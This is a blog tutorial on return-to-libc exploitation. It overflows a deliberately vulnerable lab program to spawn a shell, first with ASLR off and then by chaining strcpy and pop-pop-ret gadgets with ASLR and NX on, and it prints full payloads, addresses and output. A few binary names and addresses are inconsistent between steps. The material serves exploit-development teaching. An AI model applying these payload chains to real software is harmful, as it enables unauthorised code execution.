Defeating NX: The Return-to-libc Method
13 Oct 2022
In “Defeating ASLR: The Return-to-pop Method”, I constructed a payload that used the ret
and pop-ret
instructions to inject shellcode into our vulnerable program with ASLR enabled but non-executable stack (hereinafter “NX”) disabled. The payload worked just as expected because we knew that the memory space between ans_buf
and the address we were returning to is larger than our shellcode. What if the memory space is not large enough? More importantly, what if we do not have a shellcode at our disposal? In this post, I would like to describe an exploitation technique called “return-to-libc”, which makes use of existing code (“libc” is used by convention as a shorthand for the “standard C library”) to spawn a shell. The documentation is organized into two parts: for the first part, the ASLR protection is turned off; and for the second part, both ASLR and NX are enabled.
Table of Contents
Part I
Let’s first disable ASLR:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
The vulnerable program contains the following code:
/* ans_check.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_answer(char *ans) {
int ans_flag = 0;
char ans_buf[38];
strcpy(ans_buf, ans);
if (strcmp(ans_buf, "forty-two") == 0)
ans_flag = 1;
return ans_flag;
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <answer>\n", argv[0]);
exit(0);
}
if (check_answer(argv[1])) {
printf("Right answer!\n");
} else {
printf("Wrong answer!\n");
}
printf("About to exit!\n");
fflush(stdout);
system("/bin/date");
fflush(stdout);
}
Compile ans_check.c
with the -fno-stack-protector
option to disable stack canaries but with NX enabled, and run the program:
$ touch ans_check.c
$ vim ans_check.c
$ gcc -g -m32 -no-pie -fno-stack-protector ans_check.c -o ans_check
$ ./ans_check forty-one
Wrong answer!
About to exit!
Thu Oct 6 11:27:14 EDT 2022
The payload for the return-to-libc exploit should have the following structure:
PADDING | &system() | &exit_path | &cmd_string
Ignoring the padding, the first two values are addresses of code. The third value is the address of a properly terminated string containing the same of the program that we wish to execute. In our examples, we will use “/bin/bash
”. The amount of PADDING
must be such that the &system()
value overwrites the return address on the stack.
Addresses We Need
Let’s find out the address of the system()
standard C library function:
$ objdump -D ans_check7 | grep system
08049110 <system@plt>:
8049363: e8 a8 fd ff ff call 8049110 <system@plt>
We shall use the address 0x08049110
for &system()
.
Find an address to serve as the &exit_path
:
$ objdump -D ans_check7 | grep -A 30 \<main\>
080492ae <main>:
...
80492ee: 6a 00 push $0x0
80492f0: e8 2b fe ff ff call 8049120 <exit@plt>
...
8049301: e8 50 ff ff ff call 8049256 <check_answer>
8049306: 83 c4 10 add $0x10,%esp
...
We shall use the address 0x080492ee
for &exit(0)
. Additionally, it is shown above that the check_answer()
function returns to the address 0x08049306
.
To find our input string “/bin/bash
”, the find_var.c
program may be used:
/* find_var.c */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
if (!argv[1])
exit(1);
printf("%p\n", getenv(argv[1]));
return 0;
}
Or, we can also use gdb
:
gdb-peda$ x/20s 0xffffd7e2
0xffffd7e2: "forty-one"
0xffffd7ec: "SHELL=/bin/bash"
0xffffd7fc: "SUDO_GID=1000"
0xffffd80a: "SUDO_COMMAND=/usr/bin/su seed"
0xffffd828: "SUDO_USER=ubuntu"
0xffffd839: "PWD=/home/seed/Documents/cse523s/return2libc"
0xffffd866: "LOGNAME=seed"
0xffffd873: "_=/usr/bin/gdb"
0xffffd882: "LINES=21"
0xffffd88b: "HOME=/home/seed"
0xffffd89b: "LANG=C.UTF-8"
...
The above results show that the string starts at 0xffffd7ec
. Nevertheless, running find_var.c
, I got the output 0xffffd832
. If we type unset environment LINES
and unset environment COLUMNS
in gdb
, the two addresses should be identical.
Assemble the Payload
We are now ready to construct our payload using the addresses we just gathered. First, run echo $$
:
$ echo $$
2366
I then tried the following input string:
$ ./ans_check7 $(perl -e 'print "\x90"x2, "\x10\x91\x04\x08"x19, "\xee\x92\x04\x08", "\x32\xd8\xff\xff"')
which produces:
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: j: not found
Note that the leading two bytes of NOPS in our payload are for four-byte alignment requirement, given that ans_buf
has a size of \(38\) bytes. The output indicates that &system()
does overwrite the return address but the SHELL
variable is wrongly positioned. I kept decreasing the value of repeated &system()
until:
$ ./ans_check7 $(perl -e 'print "\x90"x2, "\x10\x91\x04\x08"x14, "\xee\x92\x04\x08", "\x32\xd8\xff\xff"')
sh: 1: /bash: not found
This result indicates that the SHELL
variable is correctly positioned but the address I provided is probably off by a few bytes. If I modify the byte stream of \x32\xd8\xff\xff
to \x2e\xd8\xff\xff
:
$ ./ans_check7 $(perl -e 'print ""\x90"x2, "\x10\x91\x04\x08"x14, "\xee\x92\x04\x08", "\x2e\xd8\xff\xff"')
$ echo $$
3641
The shell is spawned successfully. Alternatively, this command also works:
$ ./ans_check7 $(perl -e 'print "\x90"x54, "\x10\x91\x04\x08", "\xee\x92\x04\x08", "\x2e\xd8\xff\xff"')
Part II
Ensure that ASLR is turned on:
$ cat /proc/sys/kernel/randomize_va_space
2
We can use the return-to-libc method to construct our target string at an address of our choosing, and then provide this address. In particular, we can construct a build-string payload with the following organization:
&strcpy@plt | &pop-pop-ret | str_loc_1 | src_byte_addr_1 |
&strcpy@plt | &pop-pop-ret | str_loc_2 | src_byte_addr_2 |
...
&strcpy@plt | &pop-pop-ret | str_loc_n | src_byte_addr_n |
where:
&strcpy@plt
is the address of thestrcpy
libc function, which will be used to create our desired string by copying it one character at a time;&pop-pop-ret
is the address of apop-pop-ret
instruction sequence in our binary;str_loc_i
’s are our chosen destination string addresses;src_byte_addr_i
is the address that holds the byte representation of the ith character in our target string;&strcpy@plt
on the first line is positioned within the payload to overwrite the return address on the stack.
If we inject the above instructions properly onto the stack, our vulnerable program will return to the first &strcpy@plt
instead of its original return address. And what will happen? The addresses str_loc_1
and src_byte_addr_1
are arguments for the strcpy
libc function. The character stored at src_byte_addr_1
will be copied into str_loc_1
. The strcpy
function will subsequently return to the first &pop-pop-ret
sequence, which pops str_loc_1
and src_byte_addr_1
off the stack and pushes the next instruction (the second &strcpy@plt
) onto the stack. In this way, our n strcpy
functions are chained together to create an n-byte string starting at str_loc_1
. The new payload we are developing is to have the following structure:
PADDING | build-string-payload | &system() | &exit_path | &cmd_string
We can use the same method shown in Part I to obtain the addresses of system()
, exit(0)
, strcpy()
, and pop-pop-ret
. We will next choose an address to serve as our string destination. Our chosen address needs to be stable, readable, and writable, and capable of being safely overwritten. In our example, we will consider the .bss
section of the address space. We can find this address with the readelf
utility. Execute the following command:
$ readelf -S ans_check
There are 36 section headers, starting at offset 0x41f8:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 080481b4 0001b4 000013 00 A 0 0 1
[ 2] .note.gnu.build-i NOTE 080481c8 0001c8 000024 00 A 0 0 4
[ 3] .note.gnu.propert NOTE 080481ec 0001ec 00001c 00 A 0 0 4
[ 4] .note.ABI-tag NOTE 08048208 000208 000020 00 A 0 0 4
[ 5] .gnu.hash GNU_HASH 08048228 000228 000020 04 A 6 0 4
[ 6] .dynsym DYNSYM 08048248 000248 0000c0 10 A 7 1 4
[ 7] .dynstr STRTAB 08048308 000308 000079 00 A 0 0 1
[ 8] .gnu.version VERSYM 08048382 000382 000018 02 A 6 0 2
[ 9] .gnu.version_r VERNEED 0804839c 00039c 000020 00 A 7 1 4
[10] .rel.dyn REL 080483bc 0003bc 000010 08 A 6 0 4
[11] .rel.plt REL 080483cc 0003cc 000040 08 AI 6 24 4
[12] .init PROGBITS 08049000 001000 000024 00 AX 0 0 4
[13] .plt PROGBITS 08049030 001030 000090 04 AX 0 0 16
[14] .plt.sec PROGBITS 080490c0 0010c0 000080 10 AX 0 0 16
[15] .text PROGBITS 08049140 001140 0002c9 00 AX 0 0 16
[16] .fini PROGBITS 0804940c 00140c 000018 00 AX 0 0 4
[17] .rodata PROGBITS 0804a000 002000 00005b 00 A 0 0 4
[18] .eh_frame_hdr PROGBITS 0804a05c 00205c 000054 00 A 0 0 4
[19] .eh_frame PROGBITS 0804a0b0 0020b0 000148 00 A 0 0 4
[20] .init_array INIT_ARRAY 0804bf08 002f08 000004 04 WA 0 0 4
[21] .fini_array FINI_ARRAY 0804bf0c 002f0c 000004 04 WA 0 0 4
[22] .dynamic DYNAMIC 0804bf10 002f10 0000e8 08 WA 7 0 4
[23] .got PROGBITS 0804bff8 002ff8 000008 04 WA 0 0 4
[24] .got.plt PROGBITS 0804c000 003000 00002c 04 WA 0 0 4
[25] .data PROGBITS 0804c02c 00302c 000008 00 WA 0 0 4
[26] .bss NOBITS 0804c034 003034 000004 00 WA 0 0 1
[27] .comment PROGBITS 00000000 003034 00002b 01 MS 0 0 1
[28] .debug_aranges PROGBITS 00000000 00305f 000020 00 0 0 1
[29] .debug_info PROGBITS 00000000 00307f 000388 00 0 0 1
[30] .debug_abbrev PROGBITS 00000000 003407 00010a 00 0 0 1
[31] .debug_line PROGBITS 00000000 003511 000129 00 0 0 1
[32] .debug_str PROGBITS 00000000 00363a 0002ea 01 MS 0 0 1
[33] .symtab SYMTAB 00000000 003924 0004f0 10 34 50 4
[34] .strtab STRTAB 00000000 003e14 000286 00 0 0 1
[35] .shstrtab STRTAB 00000000 00409a 00015d 00 0 0 1
The .bss
section starts at 0x0804c034
with flags W
(write) and A
(alloc). However, rather than using that exact address as our string destination address, we will choose the next-highest address that ends in 01
to avoid the null terminator. Here, we shall use the address 0x0804c041
, i.e. str_loc_1 = 0x0804c041
.
Find the Characters
Finally, we need to assemble the addresses of the characters that will be used to create our string. Use the command:
$ readelf -x i ans_check
to iterate through the sections, where i should be replaced with section numbers. I dumped the read-only data section:
$ readelf -x 17 ans_check
Hex dump of section '.rodata':
0x0804a000 03000000 01000200 666f7274 792d7477 ........forty-tw
0x0804a010 6f005573 6167653a 20257320 3c616e73 o.Usage: %s <ans
0x0804a020 7765723e 0a005269 67687420 616e7377 wer>..Right answ
0x0804a030 65722100 57726f6e 6720616e 73776572 er!.Wrong answer
0x0804a040 21004162 6f757420 746f2065 78697421 !.About to exit!
0x0804a050 002f6269 6e2f6461 746500 ./bin/date.
Below are the addresses I chose:
Character | Hex Representation | Payload Tag | Address |
---|---|---|---|
/ |
2f |
src_byte_addr_1 , src_byte_addr_5 |
0x0804a051 |
b |
62 |
src_byte_addr_2 , src_byte_addr_6 |
0x0804a052 |
i |
69 |
src_byte_addr_3 |
0x0804a053 |
n |
6e |
src_byte_addr_4 |
0x0804a054 |
a |
61 |
src_byte_addr_7 |
0x0804a057 |
s |
73 |
src_byte_addr_8 |
0x0804a013 |
h |
68 |
src_byte_addr_9 |
0x0804a029 |
null_terminator |
00 |
src_byte_addr_10 |
0x0804a050 |
Assemble the Payload
Our constructed build-string payload may look like this:
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x41\xc0\x04\x08 | \x51\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x42\xc0\x04\x08 | \x52\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x43\xc0\x04\x08 | \x53\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x44\xc0\x04\x08 | \x54\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x45\xc0\x04\x08 | \x51\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x46\xc0\x04\x08 | \x52\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x47\xc0\x04\x08 | \x57\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x48\xc0\x04\x08 | \x13\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x49\xc0\x04\x08 | \x29\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x4a\xc0\x04\x08 | \x50\xa0\x04\x08
Successfully obtained the shell:
$ echo $$
1950
$ ./ans_check7 $(perl -e 'print
"\x90"x2, "\x10\x91\x04\x08"x13,
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x41\xc0\x04\x08\x51\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x42\xc0\x04\x08\x52\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x43\xc0\x04\x08\x53\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x44\xc0\x04\x08\x54\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x45\xc0\x04\x08\x51\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x46\xc0\x04\x08\x52\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x47\xc0\x04\x08\x57\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x48\xc0\x04\x08\x13\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x49\xc0\x04\x08\x29\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x4a\xc0\x04\x08\x50\xa0\x04\x08",
"\x10\x91\x04\x08", "\xee\x92\x04\x08", "\x41\xc0\x04\x08"')
$ echo $$
1962